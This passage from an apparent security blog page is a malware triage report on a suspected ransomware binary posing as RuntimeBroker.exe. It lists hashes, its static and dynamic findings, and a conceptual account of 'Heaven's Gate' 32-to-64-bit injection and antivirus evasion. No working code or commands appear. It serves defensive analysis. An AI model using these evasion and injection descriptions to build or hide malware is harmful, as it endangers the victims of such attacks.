    style=&quot;padding-bottom: 25%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAIAAADKYVtkAAAACXBIWXMAABYlAAAWJQFJUiTwAAABAUlEQVR42j3OUU+DMBAH8D5skmjUREVGAHFEOgZYoEycUAZlg3SAStDFJfPFD+D3f7U6s+SXy90/d8mBz7h/nZQlpMzOmUVyBecqplrI63+v4kILeUJVHoa1ErQaXl06m3ANvmm/Q0V3EzYjv7qw/aFuD3RnoLvD2z2H4+PR+MATDAsoFSRgS7qPqH2+X1Itiq9RIvmpjDM1JLIfiygZ+UTyiRw8iWh+5e7xHp/CTdSAt6iuTMJMkimzRPL4Ad+ORe/hfBoc33H4xJydWUgwDr8gYQyB3LoF2C7ee/yyxnX32KxdypycubQwkyUkqwmX/lZISistrcWftJpmuTH/YrsfmGo3v5raQFwAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Download&quot;
        title=&quot;&quot;
        src=&quot;/website/static/e1bc10db1dabf585d46fc7dea21ca358/062c8/RuntimeBroker4.png&quot;
        srcset=&quot;/website/static/e1bc10db1dabf585d46fc7dea21ca358/804b2/RuntimeBroker4.png 384w,
/website/static/e1bc10db1dabf585d46fc7dea21ca358/e5715/RuntimeBroker4.png 768w,
/website/static/e1bc10db1dabf585d46fc7dea21ca358/062c8/RuntimeBroker4.png 1386w&quot;
        sizes=&quot;(max-width: 1386px) 100vw, 1386px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;
&lt;/br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h2&gt;2. Malware Analysis and Triage Report: RuntimeBroker.exe &lt;a id=&quot;2-Malware-Analysis-and-Triage-Report-RuntimeBroker.exe&quot;&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;h3&gt;2.1 Executive Summary &lt;a id=&quot;executive-summary&quot;&gt;&lt;/a&gt;&lt;/h3&gt;
&lt;h4&gt;2.1.1 Fingerprinting &lt;a id=&quot;fingerprinting&quot;&gt;&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;1_ MD5: &lt;strong&gt;730f84805b3b815bf5f11b4ef0e60ee2&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;2_ SHA256: &lt;strong&gt;8a492973b12f84f49c52216d8c29755597f0b92a02311286b1f75ef5c265c30d&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;3_ VirusTotal Report: &lt;a href=&quot;https://www.virustotal.com/gui/file/8a492973b12f84f49c52216d8c29755597f0b92a02311286b1f75ef5c265c30d.html&quot;&gt;https://www.virustotal.com/gui/file/8a492973b12f84f49c52216d8c29755597f0b92a02311286b1f75ef5c265c30d&lt;/a&gt;&lt;/p&gt;
&lt;h4&gt;2.1.2 Classification &lt;a id=&quot;classification&quot;&gt;&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;The classification as of the report writing time is still under investigation. Our Threat Intel Platform identified the urls contacted as a C2 of “TheHive” ransomware group. The Virustotal platform still identifies the binary as a generic malware.&lt;/p&gt;
&lt;h4&gt;2.1.3 Behavioral Summary &lt;a id=&quot;behavioral-summary&quot;&gt;&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;The execution of the binary in a controlled sandbox results into an execution of a fake audio control center.
&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 494px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/bc80901abcae9ea0156620b9aa599476/d72d4/RuntimeBroker5.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 51.302083333333336%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAIAAAA7N+mxAAAACXBIWXMAABYlAAAWJQFJUiTwAAABiUlEQVR42n1R207CQBDtv/Ivho/wwcRHHwya9IWEyOUBlGoKAm2h2wJtCm3tdi+UtFX0UDUxkHhyMjm72Zk5M6voum5Zlm3bhJD5fL5YLEgF6x+Ypt7pOOOx4jgOpRQ5hmFAR1E0mUxms1lRFJ/nOBwQSiFeazVSryuu62ZZFoZhHMdJkjDGvjWS389Rlh+HQy7l9OJieX2tmKZZlmWe5yiR/2K/3/M/kILvBJeVkJztpJB4URQKxoPhdrsNAcOj0QiePc+DhbRCQtPlhrob6sUCXIWMBEmwjVFLsas99ft9YpNerwcxHA6xPyFEQmkm2GgZN/XVk7G8aw/V3svDs/lorJtjnwl5tI132BnmhENoVoEeke4l00ikau5g4lzdNi9v1PuONpiu7p/XKZcK2vq+jz1rmqaqaqPRQGy1Wt1uN0I5xqI3avkJ6IQCXASp4b2tNslOSgUDow9+CI0QgyDYbrdwAY3l45KldMdTUHIIKtnxyFMKjz9fBVV5Pto+Aa4Y56dkPMuyL+NpGbw2yT8SAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Control Center&quot;
        title=&quot;&quot;
        src=&quot;/website/static/bc80901abcae9ea0156620b9aa599476/d72d4/RuntimeBroker5.png&quot;
        srcset=&quot;/website/static/bc80901abcae9ea0156620b9aa599476/804b2/RuntimeBroker5.png 384w,
/website/static/bc80901abcae9ea0156620b9aa599476/d72d4/RuntimeBroker5.png 494w&quot;
        sizes=&quot;(max-width: 494px) 100vw, 494px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;This behavior is generally related to some sandbox checks by the malware or some missing files that are needed by the malware itself to execute the malicious code. In this particular case our analysis suggests that some files are missing in order to see the real effects of the malware execution. Some more details are included in the static analysis chapter (chapter 2.2).
&lt;/br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h3&gt;2.2 Static Analysis &lt;a id=&quot;static-analysis&quot;&gt;&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Starting from the VirusTotal analysis, two very suspicious points were observed: the first one is that the Creation date is in the future, and the second one is that the binary is packed using .NET 4.0 framework.&lt;/p&gt;
&lt;p&gt;These two techniques are commonly used to confuse the Antivirus (AV) static analysis and to bypass checks.
&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 704px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/b87c0be353571332d94a842775568a3f/5ebd7/RuntimeBroker6.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 96.35416666666666%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAATCAIAAAAf7rriAAAACXBIWXMAABYlAAAWJQFJUiTwAAACJElEQVR42p1TaXObMBDl//+rth/bcXDthNscukBgzH0Z7D4OJ5NOMp10kYZFq6fVvn0ojNLv337snn4fji+qut/t1J+/nmzb6YfRI5Ht8Tgt75+YUlcVpUzKJEnO53May5jzEA7AMslDmRVVe7/f3tsDjFnXFSHEdryT53MuumEMROr4oenyS95gw+2zzJht17ue//yiB4QSSm3npBl2QHgQUNNyEKKME8IQEiK0LZsL+QZu2i7LyyLHU5RVled5lmXVYml6uWT4nCPzU5ZpmmLTBv67jq+Y8gqDM61jmkbMaXPGxXlvWz4liuTxWXNdN07A8DBcR/Bz+8e4rY6SntP9/mgaJhMRmAP6C9eeLzZO1+uIrFXdAL7eq6zqum7atgOdeINIROvHWC+ugFjoSdOMMJJQC+Nirn+aLMshlAsheBj6AdF0Az1zXQ9bAsK2zKCeUs4Y830Chfh+IOMEATjASBmjyeg/5AcH+DAMuYg2cNM0+EZOzwuQF0ec0wtye8jjBRs4IJGUZDklFCH0u4GLophvy7jnA8ygUBnHCDzAki0YaAtVALZkfoDzvPD9eR9UaZgW9LTWDCIs2xVc4NDTXCq3nBOhDCzgrA3c9wOI7PoebEJ9a6vAJMoBq2hd3/fd3MIBzPfze1550/Z/m9J1XVlW6PMsxnHEEpy1w7dFsdfFPgaDAHV/QAMh0hfdBL5r2+NRA4u6bqDbqnrQDfvDP+cPMyM3Wm2o7K8AAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Defence Evasion&quot;
        title=&quot;&quot;
        src=&quot;/website/static/b87c0be353571332d94a842775568a3f/5ebd7/RuntimeBroker6.png&quot;
        srcset=&quot;/website/static/b87c0be353571332d94a842775568a3f/804b2/RuntimeBroker6.png 384w,
/website/static/b87c0be353571332d94a842775568a3f/5ebd7/RuntimeBroker6.png 704w&quot;
        sizes=&quot;(max-width: 704px) 100vw, 704px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;A packer is a tool often used to obfuscate the function names and references to avoid static analysis not only by AVs, but also by human malware analysts.&lt;/p&gt;
&lt;p&gt;The strings contained in the binary could be related to ransomware behavior: there are some Windows API calls to cryptographic DLLs and also some calls to custom functions names, like &lt;em&gt;CreateEncryptor&lt;/em&gt; and &lt;em&gt;CreateDecryptor&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;There are also references to custom functions related to encryption algorithms, like AES and RSA, and to one way hash functions like MD5.&lt;/p&gt;
&lt;p&gt;The stream reference is another clue of the malicious behavior, because ransomware usually encrypts victims files byte-by-byte, increasing the efficiency of the &lt;a href=&quot;https://learn.microsoft.com/it-it/dotnet/api/system.security.cryptography.cryptostream?view=net-7.0&quot;&gt;encryption process&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1000px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/ca49e6a40282ce24230f3d7029f4a565/00d43/RuntimeBroker7.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 75.78125%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAIAAABr+ngCAAAACXBIWXMAABYlAAAWJQFJUiTwAAAByklEQVR42oWS227aQBCGeRYIPmN8Wp/W+LheL+AAThNFfYRUidS7qlVu0qpSbyLu8rz9wVVpEijSaLSnb+bfmRms7h9vn17W37aLL8+rr1v68NO/+xF8OmP+3ffs869BUS8urz/mvI0LztvOcKOhal3ojjTxxoZ7yvDAJHTAWNN1HyrGkySraxGG1Pcj1w0kSZVlTVWNo6YouuOQQcWa9QawSPOS8XkjlrxZFCWfpaUfUFUzFXXy3mTFsB3/L9xkeVVWPC9YUdZl1TTzltXCdgje/Q/urm6QMM0qvMYWvEfCIEzMqXuUPMBIsumugaVZiRBYIH9MU8DEj46Sb2EulhQF4/Oqhn6GC92wjIl1Dt7LFqKlSd5nhn6UStPMU5pfZQaMENDZiBZbVs+JH0uyJsn6e+sjwls2+SMb/wSMaqFJaJXrhVPLQ2y86BdT27NsLMjEdP6ttlitrxAimRX4MzQjCmRHcRonWRjNoCKmGU6CkGLruMGrVgFetGvAkJ0X9VjSRhfKzkY7Px5rw5GCQ0nSd17WD7JRIfy5vdwgPDJjsNBeXMB62dCJbJo+xbT1dsiMltK9PAyGR6K9D3vlCAep4KN49mZOe/g3MOLHoMSLxP8AAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Encription1&quot;
        title=&quot;&quot;
        src=&quot;/website/static/ca49e6a40282ce24230f3d7029f4a565/00d43/RuntimeBroker7.png&quot;
        srcset=&quot;/website/static/ca49e6a40282ce24230f3d7029f4a565/804b2/RuntimeBroker7.png 384w,
/website/static/ca49e6a40282ce24230f3d7029f4a565/e5715/RuntimeBroker7.png 768w,
/website/static/ca49e6a40282ce24230f3d7029f4a565/00d43/RuntimeBroker7.png 1000w&quot;
        sizes=&quot;(max-width: 1000px) 100vw, 1000px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;There are also some strings that refer to the Windows API calls used in common code injection techniques:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 476px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/c97f19ac8e846e54077a7281b5356f31/f2205/RuntimeBroker8.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 56.25%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAIAAADwazoUAAAACXBIWXMAABYlAAAWJQFJUiTwAAABoUlEQVR42oWQ7W7TMBSGcx+IH9sQbbYl7RI7/kicDyeOEzeJ265dG0DiBsYP/vDVXQFXzakKExQkpEdH9uvzvkfHzvhxvz887L5sx2+7N4f934yH/buvu/efduPTT+Xt07j9fP/h+6ND01S2RnU9L8o5YXeU/5eAxTcBau3K4UkmclU1ncjrMEoiliEqAhwjkmCa/hPomQW0t1tHFKWsW72wQqooTjEXZbPQnU0rjbjA/KgA6DegzUekW22cvFRSGzMsIQLUkMZZpfViKFQD5yOEI5acIk5A2wyRHsxx2ZA4q3U7LNems7LSRanbxQAHqKpuG9NTLm68uTcLTvjzcOLe1to4TGpMBZi7YdkPK1lqypJKNfAmy7qsdBAS1/Um09tnpq53cfk6L9TRHPEMJvR2vVxtsrwiNFHaVKoFEYLca/9keAaUy6tJIeujmcR503brzcNg163pY/h3bRrT1Y1BmJ05/zCHibz2QxwxGMJ4Spnw/IDSBEccEw4V+s64ejV98fIiEblT2w3sjBANfwEGuCIMMAiFLc6AAXdBZO39DzPfoD8vrO52AAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Code Injection&quot;
        title=&quot;&quot;
        src=&quot;/website/static/c97f19ac8e846e54077a7281b5356f31/f2205/RuntimeBroker8.png&quot;
        srcset=&quot;/website/static/c97f19ac8e846e54077a7281b5356f31/804b2/RuntimeBroker8.png 384w,
/website/static/c97f19ac8e846e54077a7281b5356f31/f2205/RuntimeBroker8.png 476w&quot;
        sizes=&quot;(max-width: 476px) 100vw, 476px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;An interesting thing about the metadata of the packer is that they are in Italian language, which is pretty uncommon for these types of malware&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1386px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/4e390d30b28d74e79dda78aee42c04b3/062c8/RuntimeBroker9.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 78.125%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAQCAIAAACZeshMAAAACXBIWXMAABYlAAAWJQFJUiTwAAABi0lEQVR42o2TiXKCQBBElxCjkah4gAgCK4KWt+D//1ueOxE1ljFd1tawOz3Tc6jyPJ/P57nBbDaLomg0Go0NhsNhr9drNBrv9+DGsizXddV6vd7tdlrrNE1hwicWn57ntVotnNQD5LLT6SicVqvVYrEQCRichCBtt9v9MHhKbjab0+m0MJq15qeTJMmyLAiCrwusB/yQ+/0+mYuigBYnMWdmIFXA/Eu24zj4IRUCyRG/XC5rm6cwDAeDgWtAJjFoJNIUsYWAWlJx+r7fbrcJzBOnNPztBrZtk5mOqNgAb4pX/8NVNvLQ9mkg2eqEjPQFmWXYbDYyHikV5bI20gh0/RJ11zDUM1VK9S4gIp+0BJuG4SMcoV3JvE0mk2cKX8hOdbrdbhkvIQjEwqCTMwpDDEqIL+ASH2TSFBqEKMWGsN6ymNTJtNCMEyeyCYfBJUZgIDkohOGfd7vOxskz1dICOJ7vk0cG4Rgw0fqvcpa93++Px2NVVYfDoSzLE6hOfJYGKCLc+AaSnwR5nn8DPylB2g0PbSQAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;CodeInjection2&quot;
        title=&quot;&quot;
        src=&quot;/website/static/4e390d30b28d74e79dda78aee42c04b3/062c8/RuntimeBroker9.png&quot;
        srcset=&quot;/website/static/4e390d30b28d74e79dda78aee42c04b3/804b2/RuntimeBroker9.png 384w,
/website/static/4e390d30b28d74e79dda78aee42c04b3/e5715/RuntimeBroker9.png 768w,
/website/static/4e390d30b28d74e79dda78aee42c04b3/062c8/RuntimeBroker9.png 1386w&quot;
        sizes=&quot;(max-width: 1386px) 100vw, 1386px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;This is the list of files the binary modifies or looks for, it seems it is searching for a config file called &lt;em&gt;“Runtime Broker.exe.config”&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1388px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/2bdc760939f9e9fb9850f28de0e72b0c/c1bea/RuntimeBroker10.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 19.53125%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAIAAAABPYjBAAAACXBIWXMAABYlAAAWJQFJUiTwAAAAq0lEQVR42lWOyw6DIBBF/f+PapOu23Rn2KAkAvIQUFKLGh+90k17FpMJ4c65hRDi/nhK2UrBrNFd19V13TQNY6xt23Ec13U9Mt57vCilpJScc2N0EWNUSg/DEGMYXyfOub7vQwhIHj+8M/M8p8w0TQWl9HK9UVpVlAjBUaEsS0IIjm7b9o3t+45p4dIaR63FalCkgAdJTO9MPP3R5E/Lshz/oBTMEKIRlpTSB+5h4CvBHD1lAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;CodeInjection3&quot;
        title=&quot;&quot;
        src=&quot;/website/static/2bdc760939f9e9fb9850f28de0e72b0c/c1bea/RuntimeBroker10.png&quot;
        srcset=&quot;/website/static/2bdc760939f9e9fb9850f28de0e72b0c/804b2/RuntimeBroker10.png 384w,
/website/static/2bdc760939f9e9fb9850f28de0e72b0c/e5715/RuntimeBroker10.png 768w,
/website/static/2bdc760939f9e9fb9850f28de0e72b0c/c1bea/RuntimeBroker10.png 1388w&quot;
        sizes=&quot;(max-width: 1388px) 100vw, 1388px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;It also loads some dll related to crypto functions or API calls.&lt;/p&gt;
&lt;p&gt;Measuring the entropy of the binary is another way to find clues about the scope.&lt;/p&gt;
&lt;p&gt;In this case the entropy is high and constant, that’s a confirmation of obfuscation and malicious behavior.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1388px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/409b3b79f94cf0d1c7ec22939ad14388/c1bea/RuntimeBroker11.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 32.29166666666667%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAIAAABM9SnKAAAACXBIWXMAABYlAAAWJQFJUiTwAAAAqklEQVR42pWQUQ/CIAyE+f+/0hmRIZswRhkMerMz0We93EPTfpc2Vd4/mRtwurUaY0gpiolO55ykXteFaJVRKSTwm++1kroOep660fwYeXZs73hYnhz0wNbAWcQFi8fsxOyEmTh4fk64XTc1XGwtQnBasWXUilKQiaVTNqTEe0FvchXazkKS7O7o/QihKK1HMI6fhQ+771UZY4A/wl+dYa11jPKhRP8pxxhe5+FcOE/4AasAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;RuntimeExe&quot;
        title=&quot;&quot;
        src=&quot;/website/static/409b3b79f94cf0d1c7ec22939ad14388/c1bea/RuntimeBroker11.png&quot;
        srcset=&quot;/website/static/409b3b79f94cf0d1c7ec22939ad14388/804b2/RuntimeBroker11.png 384w,
/website/static/409b3b79f94cf0d1c7ec22939ad14388/e5715/RuntimeBroker11.png 768w,
/website/static/409b3b79f94cf0d1c7ec22939ad14388/c1bea/RuntimeBroker11.png 1388w&quot;
        sizes=&quot;(max-width: 1388px) 100vw, 1388px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;
&lt;em&gt;Entropy measurement&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;An analysis of the memory dump of the process detected some RSA strings related to a public key:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1384px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/2037b45f140c2f0f4d6cce38ae5806f8/0e904/RuntimeBroker12.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 20.833333333333336%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAIAAAABPYjBAAAACXBIWXMAABYlAAAWJQFJUiTwAAAAm0lEQVR42m2Oyw6DIBRECQsblrootqIICIL4WmgT/v/HOoGkq57FzWHCHSDbtvV9/848M23bYtZ1XVXV4x+MMUqpMYZg+TiOdV1jjOM4CiFeGXQV6bru5wW0N02D+8R7f57nvu9oua4LU0qplJqmCTIMAwRH9GqtS4Kfcs7xJMHCJwO57xuCOudcCGGeZ8iyLEistSUHyNGVUvoCG44d2uhKH+IAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;RSA String&quot;
        title=&quot;&quot;
        src=&quot;/website/static/2037b45f140c2f0f4d6cce38ae5806f8/0e904/RuntimeBroker12.png&quot;
        srcset=&quot;/website/static/2037b45f140c2f0f4d6cce38ae5806f8/804b2/RuntimeBroker12.png 384w,
/website/static/2037b45f140c2f0f4d6cce38ae5806f8/e5715/RuntimeBroker12.png 768w,
/website/static/2037b45f140c2f0f4d6cce38ae5806f8/0e904/RuntimeBroker12.png 1384w&quot;
        sizes=&quot;(max-width: 1384px) 100vw, 1384px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;A SID was also found, which means that the binary looks also to the privileges with which it runs.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1386px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/b97362d5eddce042f8bbf0a7af12c796/062c8/RuntimeBroker13.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 4.947916666666667%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAABCAIAAABR8BlyAAAACXBIWXMAABYlAAAWJQFJUiTwAAAAM0lEQVR42mNQUFCQkZHR0NBQV1cHslVVVZWUlNTU1ICkvLw8Ly8vNwbg4eFhZWXV0NAAAM0MBaTLjAJIAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;SID&quot;
        title=&quot;&quot;
        src=&quot;/website/static/b97362d5eddce042f8bbf0a7af12c796/062c8/RuntimeBroker13.png&quot;
        srcset=&quot;/website/static/b97362d5eddce042f8bbf0a7af12c796/804b2/RuntimeBroker13.png 384w,
/website/static/b97362d5eddce042f8bbf0a7af12c796/e5715/RuntimeBroker13.png 768w,
/website/static/b97362d5eddce042f8bbf0a7af12c796/062c8/RuntimeBroker13.png 1386w&quot;
        sizes=&quot;(max-width: 1386px) 100vw, 1386px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;
&lt;/br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h3&gt;2.3 Dynamic Analysis &lt;a id=&quot;dynamic-analysis&quot;&gt;&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;The execution of the binary in a debugger detected a code injection technique called &lt;strong&gt;“Heaven’s gate”&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;This technique consists in a binary compiled for a 32-bit system that contains a 64-bit payload. The 64-bit payload is another binary that is injected and executed using the WOW64 environment. A migration from 32 to 64 bit, bypasses most of the AV engines that are not able to track this behavior. The injection itself is done creating a new thread of the victim process in suspended mode; when the payload injection is done, the
thread is resumed using a specific API call and the payload is executed. In this case the API call is &lt;a href=&quot;https://www.ired.team/offensive-security/code-injection-process-injection/shellcode-execution-in-a-local-process-with-queueuserapc-and-nttestalert&quot;&gt;&lt;em&gt;NTTestAlert&lt;/em&gt;&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1388px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/288ee5462d82cf00ca8e797cb3def066/c1bea/RuntimeBroker14.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
